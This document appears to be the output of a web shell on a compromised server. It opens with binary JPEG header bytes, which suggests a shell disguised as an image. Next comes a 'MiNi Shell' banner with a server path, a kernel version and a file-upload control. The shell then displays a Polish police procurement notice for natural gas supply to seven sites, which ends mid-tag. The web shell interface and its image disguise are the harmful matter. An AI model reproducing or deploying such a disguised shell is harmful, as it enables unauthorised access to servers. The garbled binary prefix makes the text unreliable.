JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240201/0008552501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Kompleksowa dostawa gazu ziemnego wysokometanowego grupy E obejmująca sprzedaż i dystrybucję do jednostek Policji garnizonu dolnośląskiego w szacunkowej ilości 618 915 kWh, łącznie dla 7 pkt poboru </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930156216</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Podwale 31-33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">adam.balicki@wr.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dolnoslaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa dostawa gazu ziemnego wysokometanowego grupy E obejmująca sprzedaż i dystrybucję do jednostek Policji garnizonu dolnośląskiego w szacunkowej ilości 618 915 kWh, łącznie dla 7 pkt poboru </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb8b2dfc-c0df-11ee-bbfa-e29e26ebc6e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00085525</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00017670/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Kompleksowa dostawa paliwa gazowego (gaz ziemny)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_wroclaw/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest na Internetowej Platformie Zakupowej<br/>(platformazakupowa.pl) Open Nexus Sp. z o.o. z siedzibą w Poznaniu. Profil Nabywcy Komendy Wojewódzkiej Policji we Wrocławiu:<br/>https://platformazakupowa.pl/pn/kwp_wroclaw<br/>Adres strony internetowej prowadzonego postępowania o udzielenie zamówienia:<br/>https://platformazakupowa.pl/pn/kwp_wroclaw/proceedings, gdzie pod tytułem prowadzonego postępowania został umieszczony link<br/>bezpośrednio kierujący na zakładkę Platform Zakupowej Open Nexus, na której prowadzone jest postępowanie.<br/>Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia<br/>bezpośrednio związane z przedmiotowym postępowaniem: https://platformazakupowa.pl/pn/kwp_wroclaw/proceedings<br/>2.4. Adres poczty elektronicznej (e-mail): adam.balicki@wr.policja.gov.pl;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/kwp_wroclaw<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy:<br/>platformazakupowa.pl oraz poczty elektronicznej: adam.balicki@wr.policja.gov.pl<br/>3. W zakresie pytań technicznych związanych z działaniem systemu (Platformy) Zamawiający prosi o kontakt z Centrum Wsparcia<br/>Klienta platformazakupowa.pl pod numer 22 1010202, cwk@platformazakupowa.pl<br/>4. Wymagania techniczne i organizacyjne opisane zostały w Regulaminie platformazakupowa.pl<br/>(https://platformazakupowa.pl/strona/1-regulamin). Minimalne wymagania techniczne umożliwiające korzystanie ze Strony<br/>platformazakupowa.pl to przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą<br/>języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe. W celu założenia Konta Użytkownika na<br/>platformazakupowa.pl, konieczne jest posiadanie przez Użytkownika aktywnego konta poczty elektronicznej (e-mail) o<br/>przepustowości co najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768<br/>pikseli.<br/>5. Zamawiający zgodnie § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo –<br/>aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>5.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>5.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza<br/>wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>5.3. zainstalowana dowolna przeglądarka internetowa, Uwaga: od dnia 17 sierpnia 2021 r. ze względu na zakończenie wspierania<br/>przeglądarki Internet Explorer prze firmę Microsoft, stosowanie przeglądarki Internet Explorer nie jest dopuszczalne.<br/>5.4. włączona obsługa JavaScript,<br/>5.5. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>5.6. szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>5.7. oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Zamawiający zgodnie § 11 ust. 2 ww. rozporządzenia dopuszcza formaty przesyłanych danych oraz informuje, że maksymalny<br/>rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150<br/>MB, natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB w formatach: .pdf, .xls, .xlsx, .doc, .docx, .txt, .rtf, .xps, .odt,<br/>.ods, .odp, .ppt, .pptx, .csv, .jpg, .jpeg, .tif, .tiff, .geotiff. .png, .svg, .wav, .mp3, .avi, .mpg, .mpeg, .mp4, .m4a, .mpeg4, .ogg, .ogv,<br/>.zip, .tar, .gz, .gzip, .7z, .html, .xhtml, .css, .xml, .xsd, .gml, ,rng, .xsl, .xslt.<br/>7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>7.1. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>platformazakupowa.pl w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>7.2. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/kwp_wroclaw/proceedings</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1.1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji we Wrocławiu, ul. Podwale 31-33, 50-040<br/>Wrocław.<br/>1.2. Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>iod.kwp@wr.policja.gov.pl, tel. 47 8713598.<br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji, o którym mowa w art.<br/>275 pkt 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tekst jednolity Dz.U. z 2023 poz. 1605 ze zm.) – dalej<br/>„ustawa PZP”.<br/>1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz 74 ustawy PZP.<br/>1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy PZP przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy, a następnie w celu archiwalnym przez okres zgodny z instrukcją kancelaryjną i Jednolitym Rzeczowym Wykazem<br/>Akt. W przypadku zamówień współfinansowanych ze środków UE przez okres określony przepisami o przechowywaniu i archiwizacji<br/>dokumentów dotyczących projektów współfinansowanych z UE od dnia zakończenia postępowania o udzielenie zamówienia;<br/>1.6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP i będą skutkować brakiem możliwości udzielenia Pani/Panu zamówienia<br/>(brak możliwości zawarcia umowy w sprawie realizacji zamówienia).<br/>1.7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>1.8. Posiada Pani/Pan:<br/>1.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Pani/Pana (w przypadku, gdy skorzystanie z<br/>tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia);<br/>1.8.2. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>1.9. Nie przysługuje Pani/Panu:<br/>1.9.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>1.10. Przysługuje Pani/Panu:<br/>1.10.1. prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez<br/>administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.11. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku<br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w<br/>związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu,<br/>chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>2. Informacja o ograniczeniach stosowania przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych).<br/>2.1. Na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników).<br/>2.2. Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych, z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO, z tym, że zgodnie z art. 19 ust. 3 ustawy PZP zgłoszenie żądania ograniczenia przewarzania danych osobowych nie<br/>ogranicza przetwarzania tych danych do czasu zakończenia postępowania o udzielenie zamówienia publicznego (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PUZ-2380-007-005-007/2024/AB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Kompleksowa dostawa paliwa gazowego – gazu ziemnego wysokometanowego grupy E (zwanego dalej: paliwem gazowym) obejmująca sprzedaż i dystrybucję do jednostek Policji garnizonu dolnośląskiego w szacunkowej ilości 618 915 kWh, łącznie dla 7 punktów poboru. <br/>2.	Przedmiot zamówienia obejmuje kompleksową dostawę gazu ziemnego wysokometanowego (grupa E), to jest dostawę wraz z usługą przesyłu za pośrednictwem sieci dystrybucyjnej Polskiej Spółki Gazownictwa Sp. z o. o. Gaz wysokometanowy (grupa E) oraz gaz zaazotowany powinien być dostarczany całodobowo do punktów zdawczo – odbiorczych wskazanych w Wykazie punktów poboru (załącznik nr 3 do SWZ), którym jest zespół urządzeń gazowych służących do przyłączenia sieci wewnętrznej, będącej własnością Zamawiającego, z siecią gazową operatora systemu. <br/>3.	Wykonawca zobowiązany będzie do zapewnienia standardów jakości obsługi Zamawiającego – dostawy i przesył gazu – zgodnie z obowiązującymi w tym zakresie przepisami prawa energetycznego. Wykonawca zapewni ciągłość dostaw bez jakichkolwiek przerw w dostawach za wyjątkiem sytuacji opisanych w ustawie ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne, IRIESD, taryfie i posiadać rezerwę gwarantującą ciągłość dostaw.<br/>4.	Zamawiający nie dzieli przedmiotu zamówienia na części. Przedmiot zamówienia obejmuje 7 (siedem) zadań. Zamawiający nie dopuszcza składania ofert częściowych. Złożona oferta musi obejmować wszystkie 7 (osiem) zadań:<br/>4.1. Zadanie 1 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Szymanowskiego 11, 51-609 Wrocław, taryfa BW-5, nr punktu poboru 8018590365500019305009, prognozowane zużycie na 14 miesięcy 163 333 kWh, obiekt przyłączony do BOK Wrocław.<br/>4.2. Zadanie 2 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Wrocławska 24, 55-095 Długołęka, taryfa BW-3, nr punktu poboru 8018590365500038885179, prognozowane zużycie na 14 miesięcy 116 666 kWh, obiekt przyłączony do BOK Oleśnica.<br/>4.3. Zadanie 3 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Kościuszki 18, 58-250 Pieszyce, grupa taryfowa BW-3, nr punktu poboru 8018590365500035130821, prognozowane zużycie na 14 miesięcy 52 500 kWh, obiekt przyłączony do BOK Dzierżoniów.<br/>4.4. Zadanie 4 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Witosa 11, 55-040 Kobierzyce, taryfa BW-3, numer punktu poboru 8018590365500035143517, prognozowane zużycie na 14 miesięcy 70 000 kWh, obiekt przyłączony do BOK Wrocław. <br/>4.5. Zadanie 5 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Ogrodowa 34, 56-500 Syców, taryfa BW-4, nr punktu poboru 8018590365500029970594, prognozowane zużycie na okres 14 miesięcy 116 666 kWh, obiekt przyłączony do BOK Oleśnica.<br/>4.6. Zadanie 6 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Łódzka 34/7, 50-521 Wrocław, taryfa BW-1.1, nr punktu poboru 8018590365500033504556, prognozowane zużycie na okres 14 miesięcy 584 kWh, obiekt przyłączony do BOK Wrocław. <br/>4.7. Zadanie 7 w ramach przedmiotu zamówienia – kompleksowa dostawa i dystrybucja gazu ziemnego wysokometanowego o symbolu E do punktu poboru przy ul. Władysława Sikorskiego 5, 59-630 Mirsk, taryfa BW-3, nr punktu poboru 8018590365500039203415, prognozowane zużycie na okres 14 miesięcy 99 166 kWh, obiekt przyłączony do BOK Wrocław.<br/>5.	Łączny prognozowany wolumen w okresie 14 miesięcy wynosi 618 915 kWh dla 7 punktów odbioru (zadań). Zamawiający określa ewentualne odchylenie wolumenu względem zapotrzebowania podstawowego na poziomie maksymalnie +/- 20%.<br/>6.	W celu ustalenia prognozowanego zużycia gazu w kWh przyjęto współczynnik konwersji (11,1), dla szacowanej ilości 150 189 m3.<br/>7.	Prognozowane zużycie paliwa gazowego, o którym mowa w pkt 4 i 5, ma charakter orientacyjny – zostało sporządzone na podstawie danych historycznych z poprzednich lat. Prognoza służy do porównania złożonych ofert i w żadnym wypadku nie stanowi ze strony Zamawiającego zobowiązania do zakupu w podanej ilości. Rzeczywista ilość dostarczonego paliwa gazowego wynikać będzie z bieżących wskazań układów pomiarowych, każdego punktu poboru i może ulec zmniejszeniu jak i zwiększeniu w związku z rzeczywistym zużyciem. Wykonawcy nie będzie przysługiwało jakiekolwiek roszczenie w stosunku do Zamawiającego z tytułu nie pobrania przewidywanej ilości paliwa gazowego. Zamawiający dokona zapłaty za faktycznie pobrane ilości.<br/>8.	Parametry jakościowe paliw gazowych regulują przepisy ustawy Prawo energetyczne, akty wykonawcze (w szczególności Rozporządzenie Ministra Gospodarki z dnia 2 lipca 2010 r. w sprawie szczegółowych warunków funkcjonowania systemu gazowego (t.j.: Dz.U. z 2018 r. poz. 1158) oraz Polskie Normy. <br/>9.	Cel wykorzystania paliwa gazowego: paliwo gazowe przeznaczone jest na cele opałowe i podlega zwolnieniu z podatku akcyzowego na podstawie art. 31b ust. 2 pkt. 6 ustawy z dnia 6.12.2008 r. o podatku akcyzowym (t.j. Dz. U. z 2017 r. poz. 43 ze zm.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09121000-3 - Gaz węglowy, gaz zasilający/sieciowy lub podobne gazy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65210000-8 - Przesył gazu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span 